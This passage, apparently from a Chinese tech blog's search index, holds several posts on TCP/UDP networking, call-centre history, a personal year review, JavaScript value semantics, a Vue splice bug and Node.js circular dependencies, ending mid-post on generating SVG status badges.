运输层有两个比较重要的协议。tcp和udp。\n大哥tcp是比较严谨认真、温柔体贴、慢热内向的协议,发出去的消息,总是一个一个认真检查,等待对方回复和确认,如果一段时间内,对方没有回复确认消息,还会再次发送消息,如果对方回复说你发的太快了,tcp还会体贴的把发送消息的速度降低。\n弟弟udp则比较可爱呆萌、调皮好动、不负责任的协议。哥哥tcp所具有的特点,弟弟udp一个也没有。但是有的人说不清哪里好 但就是谁都替代不了,udp没有tcp那些复杂的校验和重传等复杂的步骤,所以它发送消息非常快,而且并不保证对方一定收到。如果对方收不到消息,那么udp就会呆萌的看着你,笑着对你说:我已经尽力了。一般语音而视频数据都是用udp协议传输的,因为音频或者视频卡了一下并不影响整体的质量,而对实时性的要求会更高。\n1.2. 运输层和网络层的区别 运输层关注的是端到端层面,及End1到End2,忽略中间的任何点。 网络层关注两点之间的层面,即hop1如何到hop2,hop2如何到hop3 网络层并不保证消息可靠性,可靠性上层的传输层负责。TCP采用超时重传,分组确认的机制,保证消息不会丢失。 从下图tcp, udp, ip协议中,可以发现\n传输层的tcp和udp都是有源端口和目的端口,但是没有ip字段 源ip和目的ip只在ip数据报中 理解各个协议,关键在于理解报文的各个字段的含义 1.3. ip和端口号的真正含义 上个章节讲到运输层和网络层的区别,其中端口号被封装在运输层,ip被封装到网络成,\n那么端口号和ip地址到底有什么区别呢?\nip用来用来标记主机的位置 端口号用来标记该数据应该被目标主机上的哪个应用程序去处理 1.4. 数据在协议栈的流动 封装与分用 当发送消息时,数据在向下传递时,经过不同层次的协议处理,打上各种头部信息 当接受消息时,数据在向上传递,通过不同的头部信息字段,才知道要交给上层的那个模块来处理。比如一个ip包,如果没有头部信息,那么这个消息究竟是交给tcp协议来处理,还是udp来处理,就不得而知了 2. 深入阅读,好书推荐 《http权威指南》 有人说这本书太厚,偷偷告诉你,其实这本书并厚,因为这本书的后面的30%部分都是附录,这本书的精华是前50%的部分 《图解http》、《图解tcp/ip》这两本图解的书,知识点讲的都是比较通俗易懂的,适合入门 《tcp/ip 详解 卷1》这本书,让你知其然,更知其所以然 《tcp/ip 基础》、《tcp/ip 路由技术》这两本书,会让你从不同角度思考协议 《精通wireshark》、《wireshark网络分析实战》如果你看了很多书,却从来没有试过网络抓包,那你只是懂纸上谈兵罢了。你永远无法理解tcp三次握手的怦然心动,与四次分手的刻骨铭心。 ","permalink":"https://wdd.js.org/posts/2019/01/books-about-network-protocol/","summary":"如何学习网络协议? 大学时,学到网络协议的7层模型时,老师教了大家一个顺口溜:物数网传会表应。并说这是重点,年年必考,5分的题目摆在这里,你们爱背不背。 考试的时候,果然遇到这个问题,搜索枯肠,只能想到这7个字的第一个字,因为这5分,差点挂科。 后来工作面试,面试官也是很喜欢七层模型,三次握手之类的问题,但是遇到这些问题时,总是觉得很心虚。\n1. 协议分层 四层网络协议模型中,应用层以下一般都是交给操作系统来处理。应用层对于四层模型来说,仅仅是冰山一角。海面下巨复杂的三层协议,都被操作系统给隐藏起来了,一般我们在页面上发起一个ajax请求,看见了network面板多了一个http请求,至于底层是如何实现的,我们并不关心。\n应⽤层负责处理特定的应⽤程序细节。 运输层运输层主要为两台主机上的应⽤程序提供端到端的通信。 网络层处理理分组在⽹网络中的活动,例例如分组的选路 链路层处理理与电缆(或其他任何传输媒介)的物理理接⼝口细节 下面重点讲一下运输层和网络层\n1.1. 运输层的两兄弟 运输层有两个比较重要的协议。tcp和udp。\n大哥tcp是比较严谨认真、温柔体贴、慢热内向的协议,发出去的消息,总是一个一个认真检查,等待对方回复和确认,如果一段时间内,对方没有回复确认消息,还会再次发送消息,如果对方回复说你发的太快了,tcp还会体贴的把发送消息的速度降低。\n弟弟udp则比较可爱呆萌、调皮好动、不负责任的协议。哥哥tcp所具有的特点,弟弟udp一个也没有。但是有的人说不清哪里好 但就是谁都替代不了,udp没有tcp那些复杂的校验和重传等复杂的步骤,所以它发送消息非常快,而且并不保证对方一定收到。如果对方收不到消息,那么udp就会呆萌的看着你,笑着对你说:我已经尽力了。一般语音而视频数据都是用udp协议传输的,因为音频或者视频卡了一下并不影响整体的质量,而对实时性的要求会更高。\n1.2. 运输层和网络层的区别 运输层关注的是端到端层面,及End1到End2,忽略中间的任何点。 网络层关注两点之间的层面,即hop1如何到hop2,hop2如何到hop3 网络层并不保证消息可靠性,可靠性上层的传输层负责。TCP采用超时重传,分组确认的机制,保证消息不会丢失。 从下图tcp, udp, ip协议中,可以发现\n传输层的tcp和udp都是有源端口和目的端口,但是没有ip字段 源ip和目的ip只在ip数据报中 理解各个协议,关键在于理解报文的各个字段的含义 1.3. ip和端口号的真正含义 上个章节讲到运输层和网络层的区别,其中端口号被封装在运输层,ip被封装到网络成,\n那么端口号和ip地址到底有什么区别呢?\nip用来用来标记主机的位置 端口号用来标记该数据应该被目标主机上的哪个应用程序去处理 1.4. 数据在协议栈的流动 封装与分用 当发送消息时,数据在向下传递时,经过不同层次的协议处理,打上各种头部信息 当接受消息时,数据在向上传递,通过不同的头部信息字段,才知道要交给上层的那个模块来处理。比如一个ip包,如果没有头部信息,那么这个消息究竟是交给tcp协议来处理,还是udp来处理,就不得而知了 2. 深入阅读,好书推荐 《http权威指南》 有人说这本书太厚,偷偷告诉你,其实这本书并厚,因为这本书的后面的30%部分都是附录,这本书的精华是前50%的部分 《图解http》、《图解tcp/ip》这两本图解的书,知识点讲的都是比较通俗易懂的,适合入门 《tcp/ip 详解 卷1》这本书,让你知其然,更知其所以然 《tcp/ip 基础》、《tcp/ip 路由技术》这两本书,会让你从不同角度思考协议 《精通wireshark》、《wireshark网络分析实战》如果你看了很多书,却从来没有试过网络抓包,那你只是懂纸上谈兵罢了。你永远无法理解tcp三次握手的怦然心动,与四次分手的刻骨铭心。 ","title":"如何学习网络协议?"},{"content":"什么是呼叫中心? 呼叫中心又称为客户服务中心。有以下关键词\nCTI 通信网络 计算机 企业级 高质量、高效率、全方位、综合信息服务 呼叫中心历史 1956年美国泛美航空公司建成世界第一家呼叫中心。\n阶段 行业范围 技术 功能与意义 第一代呼叫中心 民航 PBX、电话排队 主要服务由人工完成 第二代呼叫中心 银行、生活 IVR(交互式语音应答)、DTMF 显著提高工作效率,提供全天候服务 第三代呼叫中心 CTI(电脑计算机集成) 语音数据同步,客户信息存储与查阅,个性化服务,自动化 第四代呼叫中心 接入电子邮件、互联网、手机短信等 多渠道接入、多渠道统一排队 第五代呼叫中心 接入社交网络、社交媒体(微博、微信等) 文本交谈,音频视频沟通 呼叫中心分类 按呼叫方式分类 外呼型呼叫中心(如电话营销) 客服型呼叫中心(如客户服务) 混合型呼叫中心 (如营销和客服) 按技术架构分类 交换机 板卡 软交换(IPCC) 【交换机类型呼叫中心】\n","permalink":"https://wdd.js.org/posts/2019/01/call-center-brief-history/","summary":"什么是呼叫中心? 呼叫中心又称为客户服务中心。有以下关键词\nCTI 通信网络 计算机 企业级 高质量、高效率、全方位、综合信息服务 呼叫中心历史 1956年美国泛美航空公司建成世界第一家呼叫中心。\n阶段 行业范围 技术 功能与意义 第一代呼叫中心 民航 PBX、电话排队 主要服务由人工完成 第二代呼叫中心 银行、生活 IVR(交互式语音应答)、DTMF 显著提高工作效率,提供全天候服务 第三代呼叫中心 CTI(电脑计算机集成) 语音数据同步,客户信息存储与查阅,个性化服务,自动化 第四代呼叫中心 接入电子邮件、互联网、手机短信等 多渠道接入、多渠道统一排队 第五代呼叫中心 接入社交网络、社交媒体(微博、微信等) 文本交谈,音频视频沟通 呼叫中心分类 按呼叫方式分类 外呼型呼叫中心(如电话营销) 客服型呼叫中心(如客户服务) 混合型呼叫中心 (如营销和客服) 按技术架构分类 交换机 板卡 软交换(IPCC) 【交换机类型呼叫中心】","title":"呼叫中心简史"},{"content":"2008-2018 十年,往事如昨 2018年已经是昨天,今天是2019的第一天。\n2008年已经是10年前,10年前的傍晚,我走在南京仙林的一个大街上,提着一瓶矿泉水,擦着额头的汗水,仰头看着大屏幕上播放着北京奥运会的开幕式。\n10年前的夏天,我带着一步诺基亚手机功能机,独自一人去了南京。\n坐过绣球公园的石凳,穿过天妃宫的回廊,吹过阅江楼的凉爽的江风,踏着古老斑驳的城墙,在林荫小路的长椅上,我想着10年后我会在哪里?做着什么事情?\n往事如昨,而今将近而立,但是依然觉得自己还是10年的那个独自出去玩的小男孩。\n2018 读了10年都没有读完的书,五味杂陈 2018年,在我做手术前,我觉得自己出了工作的时间外,大多数时间都在看书。2018年这一年看的书,要比2008到2018年这十年间的看的书都要多。这都归功于我对每天的看书都有定量的计划,一旦按照这个计划实行几个月,积累的效果还是非常明显的。\n2018年,手机几乎成为人的四肢之外的第五肢。对大多人来说,上厕所可以不带纸,但是不能不带手机。\n各种APP, 都在极力的吸引用户多花点时间在自己身上 信息流充斥着各种毫无营养,专门吸人眼球的垃圾新闻,但是这种新闻的阅读量还是蛮大的 各种借钱,信用卡,花呗等都像青楼的小姐,妩媚的笑容,说道:官人,进来做一做 共享单车,在今年退潮之后,才发现自己都在裸泳 比特币,挖矿机。不知道谁割了谁的韭菜,总希望有下一个傻子来接盘,最后发现自己可能就是最后一个傻子 AI,人工智能很火,放佛就快要进入终结者那样的世界 锤子垮了,曾经吹过的牛逼,曾经理想主义终于脱去那又黑又亮的面具 图灵测试(The Turing test)由艾伦·麦席森·图灵发明,指测试者与被测试者(一个人和一台机器)隔开的情况下,通过一些装置(如键盘)向被测试者随意提问。 进行多次测试后,如果有超过30%的测试者不能确定出被测试者是人还是机器,那么这台机器就通过了测试,并被认为具有人类智能。图灵测试一词来源于计算机科学和密码学的先驱阿兰·麦席森·图灵写于1950年的一篇论文《计算机器与智能》,其中30%是图灵对2000年时的机器思考能力的一个预测,目前我们已远远落后于这个预测。\n最后说一下图灵测试,在AI方面,这个测试无人不知。一个机器如果通过了图灵测试,则说明该机器具有了只能。但是三体的作者大刘曾经说过一句话,给我一种醍醐灌顶的感觉,假如一个机器人有能力通过图灵测试,却假装无法通过,你说这个机器是否具有人工智能。所以大刘的这种说法才更加让人恐惧。机器人能通过图灵测试,只说明这个机器人具有了智能。但是现阶段的智能只不过是条件反射,或者是基于概率计算的结果。后者这种能通话测试,却假装无法通过的智能。这不仅仅是智能,而是机器的城府。\n有智能的机器并不可怕,有城府的机器人才是真正的可怕。\n如果梦中更加幸福快乐,为什么要回到现实 火影的最后,大筒木辉夜使用无限月读将世界上的所有人都带入梦境,每个人的查克拉都被吸取,并作为神树的养料。\n如果真的存在大筒木这样的上帝,那么时间就是查克拉。人类唯一真正拥有过的东西,时间,将作为神树的养料,从每个人身上提取。\n各种具有吸引力的术,其实可以理解为无限月读,让人沉醉于梦幻中。\n如果梦中更加幸福快乐,为什么要回到现实中承受压力与悲哀呢? 目前我无法回复自己的这个问题,期待2019年我可以得到这个答案。\n工作方面 2019年,我会在做一些后端方面的工作,努力加油吧。\n","permalink":"https://wdd.js.org/posts/2018/01/where-time-you-spend-what-you-will-be/","summary":"2008-2018 十年,往事如昨 2018年已经是昨天,今天是2019的第一天。\n2008年已经是10年前,10年前的傍晚,我走在南京仙林的一个大街上,提着一瓶矿泉水,擦着额头的汗水,仰头看着大屏幕上播放着北京奥运会的开幕式。\n10年前的夏天,我带着一步诺基亚手机功能机,独自一人去了南京。\n坐过绣球公园的石凳,穿过天妃宫的回廊,吹过阅江楼的凉爽的江风,踏着古老斑驳的城墙,在林荫小路的长椅上,我想着10年后我会在哪里?做着什么事情?\n往事如昨,而今将近而立,但是依然觉得自己还是10年的那个独自出去玩的小男孩。\n2018 读了10年都没有读完的书,五味杂陈 2018年,在我做手术前,我觉得自己出了工作的时间外,大多数时间都在看书。2018年这一年看的书,要比2008到2018年这十年间的看的书都要多。这都归功于我对每天的看书都有定量的计划,一旦按照这个计划实行几个月,积累的效果还是非常明显的。\n2018年,手机几乎成为人的四肢之外的第五肢。对大多人来说,上厕所可以不带纸,但是不能不带手机。\n各种APP, 都在极力的吸引用户多花点时间在自己身上 信息流充斥着各种毫无营养,专门吸人眼球的垃圾新闻,但是这种新闻的阅读量还是蛮大的 各种借钱,信用卡,花呗等都像青楼的小姐,妩媚的笑容,说道:官人,进来做一做 共享单车,在今年退潮之后,才发现自己都在裸泳 比特币,挖矿机。不知道谁割了谁的韭菜,总希望有下一个傻子来接盘,最后发现自己可能就是最后一个傻子 AI,人工智能很火,放佛就快要进入终结者那样的世界 锤子垮了,曾经吹过的牛逼,曾经理想主义终于脱去那又黑又亮的面具 图灵测试(The Turing test)由艾伦·麦席森·图灵发明,指测试者与被测试者(一个人和一台机器)隔开的情况下,通过一些装置(如键盘)向被测试者随意提问。 进行多次测试后,如果有超过30%的测试者不能确定出被测试者是人还是机器,那么这台机器就通过了测试,并被认为具有人类智能。图灵测试一词来源于计算机科学和密码学的先驱阿兰·麦席森·图灵写于1950年的一篇论文《计算机器与智能》,其中30%是图灵对2000年时的机器思考能力的一个预测,目前我们已远远落后于这个预测。\n最后说一下图灵测试,在AI方面,这个测试无人不知。一个机器如果通过了图灵测试,则说明该机器具有了只能。但是三体的作者大刘曾经说过一句话,给我一种醍醐灌顶的感觉,假如一个机器人有能力通过图灵测试,却假装无法通过,你说这个机器是否具有人工智能。所以大刘的这种说法才更加让人恐惧。机器人能通过图灵测试,只说明这个机器人具有了智能。但是现阶段的智能只不过是条件反射,或者是基于概率计算的结果。后者这种能通话测试,却假装无法通过的智能。这不仅仅是智能,而是机器的城府。\n有智能的机器并不可怕,有城府的机器人才是真正的可怕。\n如果梦中更加幸福快乐,为什么要回到现实 火影的最后,大筒木辉夜使用无限月读将世界上的所有人都带入梦境,每个人的查克拉都被吸取,并作为神树的养料。\n如果真的存在大筒木这样的上帝,那么时间就是查克拉。人类唯一真正拥有过的东西,时间,将作为神树的养料,从每个人身上提取。\n各种具有吸引力的术,其实可以理解为无限月读,让人沉醉于梦幻中。\n如果梦中更加幸福快乐,为什么要回到现实中承受压力与悲哀呢? 目前我无法回复自己的这个问题,期待2019年我可以得到这个答案。\n工作方面 2019年,我会在做一些后端方面的工作,努力加油吧。","title":"时间花在哪里,你就会成为什么样的人"},{"content":"1. demo 如果你对下面的代码没有任何疑问就能自信的回答出输出的内容,那么本篇文章就不值得你浪费时间了。\nvar var1 = 1 var var2 = true var var3 = [1,2,3] var var4 = var3 function test (var1, var3) { var1 = \u0026#39;changed\u0026#39; var3[0] = \u0026#39;changed\u0026#39; var3 = \u0026#39;changed\u0026#39; } test(var1, var3) console.log(var1, var2, var3, var4) 2. 深入理解原始类型 原始类型有5个 Undefinded, Null, Boolean, Number, String\n2.1. 原始类型变量没有属性和方法 // 抬杠, 下面的length属性,toString方法怎么有属性和方法呢? var a = \u0026#39;oooo\u0026#39; a.length a.toString 原始类型中,有三个特殊的引用类型Boolean, Number, String,在操作原始类型时,原始类型变量会转换成对应的基本包装类型变量去操作。参考JavaScript高级程序设计 5.6 基本包装类型。\n2.2. 原始类型值不可变 原始类型的变量的值是不可变的,只能给变量赋予新的值。\n下面给出例子\n// str1 开始的值是aaa var str1 = \u0026#39;aaa\u0026#39; // 首先创建一个能容纳6个字符串的新字符串 // 然后再这个字符串中填充 aaa和bbb // 最后销毁字符串 aaa和bbb // 而不能理解成在str1的值aaa后追加bbb str1 = str1 + \u0026#39;bbb\u0026#39; 其他原始类型的值也是不可变的, 例如数值类型的。\n2.3. 原始类型值是字面量 3. 变量和值有什么区别? 不是每一个值都有地址,但每一个变量有。《Go程序设计语言》 变量没有类型,值有。变量可以用来保存任何类型的值。《You-Dont-Know-JS》 变量都是有内存地址的,变量有用来保存各种类型的值;不同类型的值,占用的空间不同。\nvar a = 1 typeof a // 检测的不是变量a的类型,而是a的值1的类型 4. 变量访问有哪些方式? 变量访问的方式有两种:\n按值访问 按引用访问 在JS中,五种基本类型Undefinded, Null, Boolean, Number, String是按照值访问的。基本类型变量的值就是字面上表示的值。而引用类型的值是指向该对象的指针,而指针可以理解为内存地址。\n可以理解基本类型的变量的值,就是字面上写的数值。而引用类型的值则是一个内存地址。但是这个内存地址,对于程序来说,是透明不可见的。无论是Get还是Set都无法操作这个内存地址。\n下面是个示意表格。\n语句 变量 值 Get 访问类型 var a = 1 a 1 1 按值 var a = [] a 0x00000320 [] 按引用 抬杠 Undefinded, Null, Boolean, Number是基本类型可以理解,因为这些类型的变量所占用的内存空间都是大小固定的。但是string类型的变量,字符串的长短都是不一样的,也就是说,字符串占用的内存空间大小是不固定的,为什么string被列为按值访问呢?\n基本类型和引用类型的本质区别是,当这个变量被分配值时,它需要向操作系统申请内存资源,如果你向操作系统申请的内存空间的大小是固定的,那么就是基本类型,反之,则为引用类型。\n5. 例子的解释 var var1 = 1 var var2 = true var var3 = [1,2,3] var var4 = var3 function test (var1, var3) { var1 = \u0026#39;changed\u0026#39; // a var3[0] = \u0026#39;changed\u0026#39; // b var3 = \u0026#39;changed\u0026#39; // c } test(var1, var3) console.log(var1, var2, var3, var4) 上面的js分为两个调用栈,在\n图1 外层的调用栈。有四个变量v1、v2、v3、v4 图2 调用test是传参,内层的v1、v3会屏蔽外层的v1、v3。内层的v1,v3和外层的v1、v3内存地址是不同的。内层v1和外层v1已经没有任何关系了,但是内层的v3和外层v3仍然指向同一个数组。 图3 内层的v1的值被改变成\u0026rsquo;changed‘, v3[0]的值被改变为\u0026rsquo;changed\u0026rsquo;。 图4 内层v3的值被重写为字符串changed, 彻底断了与外层v3联系。 图5 当test执行完毕,内层的v1和v3将不会存在,ox75和ox76位置的内存空间也会被释放 最终的输出:\n1 true [\u0026#34;changed\u0026#34;, 2, 3] [\u0026#34;changed\u0026#34;, 2, 3] 6. 如何深入学习JS、Node.js 看完两个stackoverflow上两个按照投票数量的榜单\nJavaScript问题榜单 Node.js问题榜单 如果学习有捷径的话,踩一遍别人踩过的坑,可能就是捷径。\n7. 参考 is-javascript-a-pass-by-reference-or-pass-by-value-language\nIs number in JavaScript immutable? duplicate\nImmutability in JavaScript\nthe-secret-life-of-javascript-primitives\nJavaScript data types and data structuresLanguages Edit Advanced\nUnderstanding Javascript immutable variable\nExplaining Value vs. Reference in Javascript\nYou-Dont-Know-JS\n《JavaScript高级程序设计(第3版)》[美] 尼古拉斯·泽卡斯\n","permalink":"https://wdd.js.org/posts/2018/12/deep-in-javascript-variable-value-arguments/","summary":"1. demo 如果你对下面的代码没有任何疑问就能自信的回答出输出的内容,那么本篇文章就不值得你浪费时间了。\nvar var1 = 1 var var2 = true var var3 = [1,2,3] var var4 = var3 function test (var1, var3) { var1 = \u0026#39;changed\u0026#39; var3[0] = \u0026#39;changed\u0026#39; var3 = \u0026#39;changed\u0026#39; } test(var1, var3) console.log(var1, var2, var3, var4) 2. 深入理解原始类型 原始类型有5个 Undefinded, Null, Boolean, Number, String\n2.1. 原始类型变量没有属性和方法 // 抬杠, 下面的length属性,toString方法怎么有属性和方法呢? var a = \u0026#39;oooo\u0026#39; a.length a.toString 原始类型中,有三个特殊的引用类型Boolean, Number, String,在操作原始类型时,原始类型变量会转换成对应的基本包装类型变量去操作。参考JavaScript高级程序设计 5.6 基本包装类型。\n2.2. 原始类型值不可变 原始类型的变量的值是不可变的,只能给变量赋予新的值。\n下面给出例子\n// str1 开始的值是aaa var str1 = \u0026#39;aaa\u0026#39; // 首先创建一个能容纳6个字符串的新字符串 // 然后再这个字符串中填充 aaa和bbb // 最后销毁字符串 aaa和bbb // 而不能理解成在str1的值aaa后追加bbb str1 = str1 + \u0026#39;bbb\u0026#39; 其他原始类型的值也是不可变的, 例如数值类型的。","title":"深入理解 JavaScript中的变量、值、函数传参"},{"content":"当函数执行到this.agents.splice()时,我设置了断点。发现传参index是0,但是页面上的列表项对应的第一行数据没有被删除,\nWTF!!! 这是什么鬼!然后我打开Vue Devtools, 然后刷新了一下,发现那个数组的第一项还是存在的。什么鬼??\nremoveOneAgentByIndex: function (index) { this.agents.splice(index, 1) } 然后我就谷歌了一下,发现这个splice not working properly my object list VueJs, 大概意思是v-for的时候最好给列表项绑定:key=。然后我是试了这个方法,发现没啥作用。\n最终我决定,单步调试,如果我发现该问题出在Vue自身,那我就该抛弃Vue, 学习React了\n单步调试中出现一个异常的情况,removeOneAgentByIndex是被A函数调用的,A函数由websocket事件驱动。正常情况下应该触发一次的事件,服务端却发送了两次到客户端。由于事件重复,第一次执行A删除时,实际上removeOneAgentByIndex是执行成功了,但是重复的第二个事件到来时,A函数又往agents数组中添加了一项。导致看起来,removeOneAgentByIndex函数执行起来似乎没有设么作用。而且这两个重复的事件是在几乎是在同一时间发送到客户端,所以我几乎花了将近一个小时去解决这个bug。引起这个bug的原因是事件重复,所以我在前端代码中加入事件去重功能,最终解决这个问题。\n我记得之前看过一篇文章,一个开发者调通过回调函数计费,回调函数是由事件触发,但是没想到有时候事件会重发,导致重复计费。后来这名开发者在自己的代码中加入事件去重的功能,最终解决了这个问题。\n事后总结:我觉得我不该怀疑Vue这种库出现了问题,但是我又不禁去怀疑。\n通过这个bug, 我也学到了第二方法,可以删除Vue数组中的某一项,参考下面代码。\n// Only in 2.2.0+: Also works with Array + index. removeOneAgentByIndex: function (index) { this.$delete(this.agents, index) } 另外Vue devtools有时候并不会实时的观测到组件属性的变化,即使点了Refresh按钮。如果点了Refresh按钮还不行,那建议你重新打开谷歌浏览器的devtools面板。\n","permalink":"https://wdd.js.org/posts/2018/12/vue-array-splice-not-work/","summary":"当函数执行到this.agents.splice()时,我设置了断点。发现传参index是0,但是页面上的列表项对应的第一行数据没有被删除,\nWTF!!! 这是什么鬼!然后我打开Vue Devtools, 然后刷新了一下,发现那个数组的第一项还是存在的。什么鬼??\nremoveOneAgentByIndex: function (index) { this.agents.splice(index, 1) } 然后我就谷歌了一下,发现这个splice not working properly my object list VueJs, 大概意思是v-for的时候最好给列表项绑定:key=。然后我是试了这个方法,发现没啥作用。\n最终我决定,单步调试,如果我发现该问题出在Vue自身,那我就该抛弃Vue, 学习React了\n单步调试中出现一个异常的情况,removeOneAgentByIndex是被A函数调用的,A函数由websocket事件驱动。正常情况下应该触发一次的事件,服务端却发送了两次到客户端。由于事件重复,第一次执行A删除时,实际上removeOneAgentByIndex是执行成功了,但是重复的第二个事件到来时,A函数又往agents数组中添加了一项。导致看起来,removeOneAgentByIndex函数执行起来似乎没有设么作用。而且这两个重复的事件是在几乎是在同一时间发送到客户端,所以我几乎花了将近一个小时去解决这个bug。引起这个bug的原因是事件重复,所以我在前端代码中加入事件去重功能,最终解决这个问题。\n我记得之前看过一篇文章,一个开发者调通过回调函数计费,回调函数是由事件触发,但是没想到有时候事件会重发,导致重复计费。后来这名开发者在自己的代码中加入事件去重的功能,最终解决了这个问题。\n事后总结:我觉得我不该怀疑Vue这种库出现了问题,但是我又不禁去怀疑。\n通过这个bug, 我也学到了第二方法,可以删除Vue数组中的某一项,参考下面代码。\n// Only in 2.2.0+: Also works with Array + index. removeOneAgentByIndex: function (index) { this.$delete(this.agents, index) } 另外Vue devtools有时候并不会实时的观测到组件属性的变化,即使点了Refresh按钮。如果点了Refresh按钮还不行,那建议你重新打开谷歌浏览器的devtools面板。","title":"WTF!! Vue数组splice方法无法正常工作"},{"content":"本文重点是讲解如何解决循环依赖这个问题。关心这个问题是如何产生的,可以自行谷歌。\n如何重现这个问题 // a.js const {sayB} = require(\u0026#39;./b.js\u0026#39;) sayB() function sayA () { console.log(\u0026#39;say A\u0026#39;) } module.exports = { sayA } // b.js const {sayA} = require(\u0026#39;./a.js\u0026#39;) sayA() function sayB () { console.log(\u0026#39;say B\u0026#39;) } module.exports = { sayB } 执行下面的代码\n➜ test git:(master) ✗ node a.js /Users/dd/wj-gitlab/tools/test/b.js:3 sayA() ^ TypeError: sayA is not a function at Object.\u0026lt;anonymous\u0026gt; (/Users/dd/wj-gitlab/tools/test/b.js:3:1) at Module._compile (module.js:635:30) at Object.Module._extensions..js (module.js:646:10) at Module.load (module.js:554:32) at tryModuleLoad (module.js:497:12) at Function.Module._load (module.js:489:3) at Module.require (module.js:579:17) at require (internal/module.js:11:18) at Object.\u0026lt;anonymous\u0026gt; (/Users/dd/wj-gitlab/tools/test/a.js:1:78) at Module._compile (module.js:635:30) sayA is not a function那么sayA是个什么呢,实际上它是 undefined\n遇到这种问题时,你最好能意识到可能是循环依赖的问题,否则找问题可能事倍功半。\n如何找到循环依赖的的文件 上文的示例代码很简单,2个文件,很容易找出循环依赖。如果有十几个文件,手工去找循环依赖的文件,也是非常麻烦的。\n下面推荐一个工具 madge, 它可以可视化的查看文件之间的依赖关系。\n注意下图1,以cli.js为起点,所有的箭头都是向右展开的,这说明没有循环依赖。如果有箭头出现向左逆流,那么就可能是循环依赖的点。\n图2中,出现向左的箭头,说明出现了循环依赖,说明要此处断开循环。\n如何解决循环依赖 方案1: 先导出自身模块 将module.exports放到文件头部,先将自身模块导出,然后再导入其他模块。\n来自:http://maples7.com/2016/08/17/cyclic-dependencies-in-node-and-its-solution/\n// a.js module.exports = { sayA } const {sayB} = require(\u0026#39;./b.js\u0026#39;) sayB() function sayA () { console.log(\u0026#39;say A\u0026#39;) } // b.js module.exports = { sayB } const {sayA} = require(\u0026#39;./a.js\u0026#39;) console.log(typeof sayA) sayA() function sayB () { console.log(\u0026#39;say A\u0026#39;) } 方案2: 间接调用 通过引入一个event的消息传递,让多个个模块可以间接传递消息,多个模块之间也可以通过发消息相互调用。\n// a.js require(\u0026#39;./b.js\u0026#39;) const bus = require(\u0026#39;./bus.js\u0026#39;) bus.on(\u0026#39;sayA\u0026#39;, sayA) setTimeout(() =\u0026gt; { bus.emit(\u0026#39;sayB\u0026#39;) }, 0) function sayA () { console.log(\u0026#39;say A\u0026#39;) } module.exports = { sayA } // b.js const bus = require(\u0026#39;./bus.js\u0026#39;) bus.on(\u0026#39;sayB\u0026#39;, sayB) setTimeout(() =\u0026gt; { bus.emit(\u0026#39;sayA\u0026#39;) }, 0) function sayB () { console.log(\u0026#39;say B\u0026#39;) } module.exports = { sayB } // bus.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} module.exports = new MyEmitter() 总结 出现循环依赖,往往是代码的结构出现了问题。应当主动去避免循环依赖这种问题,但是遇到这种问题,无法避免时,也要意识到是循环依赖导致的问题,并找方案解决。\n最后给出一个有意思的问题,下面的代码运行node a.js会输出什么?为什么会这样?\n// a.js var moduleB = require(\u0026#39;./b.js\u0026#39;) setInterval(() =\u0026gt; { console.log(\u0026#39;setInterval A\u0026#39;) }, 500) setTimeout(() =\u0026gt; { console.log(\u0026#39;setTimeout moduleA\u0026#39;) moduleB.sayB() }, 2000) function sayA () { console.log(\u0026#39;say A\u0026#39;) } module.exports = { sayA } // b.js var moduleA = require(\u0026#39;./a.js\u0026#39;) setInterval(() =\u0026gt; { console.log(\u0026#39;setInterval B\u0026#39;) }, 500) setTimeout(() =\u0026gt; { console.log(\u0026#39;setTimeout moduleB\u0026#39;) moduleA.sayA() }, 2000) function sayB () { console.log(\u0026#39;say B\u0026#39;) } module.exports = { sayB } ","permalink":"https://wdd.js.org/posts/2018/10/how-to-fix-circular-dependencies-in-node-js/","summary":"本文重点是讲解如何解决循环依赖这个问题。关心这个问题是如何产生的,可以自行谷歌。\n如何重现这个问题 // a.js const {sayB} = require(\u0026#39;./b.js\u0026#39;) sayB() function sayA () { console.log(\u0026#39;say A\u0026#39;) } module.exports = { sayA } // b.js const {sayA} = require(\u0026#39;./a.js\u0026#39;) sayA() function sayB () { console.log(\u0026#39;say B\u0026#39;) } module.exports = { sayB } 执行下面的代码\n➜ test git:(master) ✗ node a.js /Users/dd/wj-gitlab/tools/test/b.js:3 sayA() ^ TypeError: sayA is not a function at Object.\u0026lt;anonymous\u0026gt; (/Users/dd/wj-gitlab/tools/test/b.js:3:1) at Module._compile (module.js:635:30) at Object.Module._extensions..js (module.js:646:10) at Module.load (module.js:554:32) at tryModuleLoad (module.","title":"Node.js 如何找出循环依赖的文件?如何解决循环依赖问题?"},{"content":"shields小徽章介绍 一般开源项目都会有一些小徽章来标识项目的状态信息,并且这些信息是会自动更新的。在shields的官网https://shields.io/#/, 上面有各种各样的小图标,并且有很多自定义的方案。\n起因:如何给私有部署的jenkins制作shields服务? 私有部署的jenkins是用来打包docker镜像的,而我想获取最新的项目打包的jenkins镜像信息。但是私有的jenkins项目信息,公网的shields服务是无法获取其信息的。那么如果搭建一个私有的shields服务呢?\n第一步:如何根据一些信息,制作svg图标 查看shields图标的源码,可以看到这些图标都是svg格式的图标。然后的思路就是,将文字信息转成svg图标。最后我发现这个思路是个死胡同,\n有个npm包叫做,text-to-svg, 似乎可以将文本转成svg, 但是看了文本转svg的效果,果断就放弃了。\n最后回到起点,看了shields官方仓库,发现一个templates目录,豁然开朗。原来svg图标是由svg的模板生成的,每次生成图标只需要将信息添加到模板中,然后就可以渲染出svg字符串了。\n顺着这个思路,发现一个包shields-lightweight\nvar shields = require(\u0026#39;shields-lightweight\u0026#39;); var svgBadge = shields.svg(\u0026#39;subject\u0026#39;, \u0026#39;status\u0026#39;, \u0026#39;red\u0026#39;, \u0026#39;flat\u0026#39;); 这个包的确可以生成和shields一样的小徽章,但是如果徽章中有中文,那么中文就会溢出。因为一个中文字符的宽度要比一个英文字符宽很多。\n所以我就fork了这个项目,重写了图标宽度计算的方式。shields-less\nnpm install shields-less var shieldsLess = require(\u0026#39;shields-less\u0026#39;) var svgBadge = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39; }) var svgBadge2 = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39;, style: \u0026#39;square\u0026#39; }) var svgBadge2 = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39;, 